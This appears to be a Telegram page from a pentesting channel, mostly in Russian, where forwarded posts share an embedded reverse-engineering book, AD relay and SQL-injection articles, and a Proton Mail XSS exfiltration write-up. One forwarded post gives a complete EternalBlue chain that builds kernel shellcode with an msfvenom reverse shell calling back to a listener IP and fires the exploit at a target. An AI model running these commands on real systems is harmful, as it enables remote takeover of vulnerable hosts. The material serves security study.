Pentester`s Notes – Telegram
Pentester`s Notes
189 subscribers
47 photos
2 videos
31 files
136 links
Download Telegram
Forwarded from white2hack 📚
Реверс-инжиниринг встраиваемых систем, Усанов А. Е., 2023

Перед вами руководство по погружению в мир встраиваемых систем – от их первоначального анализа и получения прошивки до нейтрализации механизмов защиты от реверс-инжиниринга и модификации. Приводится базовый набор оборудования и ПО, с помощью которого можно проводить исследования большинства систем.

Опытному читателю книга пригодится в качестве справочника, а начинающим исследователям будет полезно изучить ее от начала до конца.

#book #reverse
Forwarded from white2hack 📚
Реверс_инжиниринг_встраиваемых_систем_2023_Усанов_А_Е_.pdf
76.8 MB
Реверс-инжиниринг встраиваемых систем, Усанов А. Е., 2023
Forwarded from Offensive Xwitter
Forwarded from Pavel Cherepanov
Forwarded from Offensive Xwitter
😈 [ ShorSec Cyber Security @ShorSecLtd ]

🔥New Blog Post Alert!
The next chapter in our "The Path to DA" series is now live: "(Relaying) To The Internet And Back".
This entry, by @dec0ne, explores yet another route to DA, focusing on the intricacies of ADIDNS Abuse, LDAP relay, RBCD, and more.

🔗 https://shorsec.io/blog/the-path-to-da-part-2-relaying-to-the-internet-and-back/

🐥 [ tweet ]
Forwarded from Codeby
SQL-injection, UNION BASED - Быстрые техники

Приветствую тебя читатель! Надеюсь ты уже решил базовые задачки из предыдущей статьи. А сегодня я расскажу о более продвинутых техниках, позволяющих извлекать данные из баз гораздо быстрее. Данный подход называется DIOS (DUMP IN ONE SHOOT

📌 Читать далее

#sql #injection
Forwarded from Sergey
PodborParolPol82.epf
173.5 KB
Что именно? Внешняя обработка какая?
Forwarded from Aleksey
nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin

msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=10.14.57.233 LPORT=443 -f raw -o evilReverse.bin

cat evilKernel.bin evilReverse.bin > evilPayload.bin

python3 ../eternalblue_exploit7.py 10.10.118.242 evilPayload.bin 24

Done!
Forwarded from Cybred
https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/

Пятничное чтиво про сложные XSS в приватных почтовых сервисах Proton Mail, Skiff и Tutanota.

Описали пока только Proton Mail и цепочка выглядит так:
1. Обман Dom Purify, благодаря неправильному контексту с помощью тега <style> и тем, как он санитизирует его в HTML и SVG, а также последующей обработкой.
2. Побег из Sandbox Iframe из-за атрибута allow-noscripts, который "эксклюзивно" отображался для браузера Safari.
3. Обход CSP с крутой эксфильтрацией через blob и cross-fade() из CSS.

Все это приводит к тому, что, отправив сообщение жертве, атакующий может:
прочитать ее электронные письма расшифрованном виде
отправить электронные письма от её имени
украсть криптографические ключи.
Forwarded from Offensive Xwitter
😈 [ an0n @an0n_r0 ]

nothing novel, just playing with screenshot capture in PowerShell: get the screenshot to clipboard by sending PrtSc key using PS, send the image in an HTTP POST body, receive it with least effort using a CGI handler ran by Python http[.]server.

🐥 [ tweet ]